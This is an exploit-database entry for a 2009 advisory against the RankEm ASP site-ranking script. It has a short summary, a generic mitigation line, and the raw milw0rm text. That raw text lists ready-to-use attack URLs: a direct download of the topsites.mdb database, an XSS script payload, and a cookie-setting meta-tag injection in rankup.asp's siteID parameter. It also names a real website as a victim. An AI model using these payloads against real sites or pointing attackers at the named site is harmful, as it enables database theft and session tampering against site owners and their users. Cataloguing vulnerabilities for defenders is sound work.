header-logo
Suggest Exploit
vendor:
RankEm
by:
Pouya_Server
8.3
CVSS
HIGH
DD/XSS/CM
N/A
CWE
Product Name: RankEm
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

RankEm

The vulnerability is a combination of DD, XSS and CM. DD is a vulnerability that allows an attacker to download the database file topsites.mdb from the path /database/. XSS is a vulnerability that allows an attacker to inject malicious JavaScript code into the siteID parameter of the rankup.asp page. CM is a vulnerability that allows an attacker to inject malicious meta tags into the siteID parameter of the rankup.asp page.

Mitigation:

Ensure that all user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

#########################################################
---------------------------------------------------------
Portal Name: RankEm
Download : http://www.katywhitton.com/downloads/rankEm/rankEmDL.zip
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD/XSS/CM)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/database/topsites.mdb
[XSS]:
http://site.com/rankup.asp?siteID=<script>alert(1369)</script>
[CM]:
http://site.com/rankup.asp?siteID=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
---------------------------------
Victem :
http://www.top50.co.nz

# milw0rm.com [2009-01-16]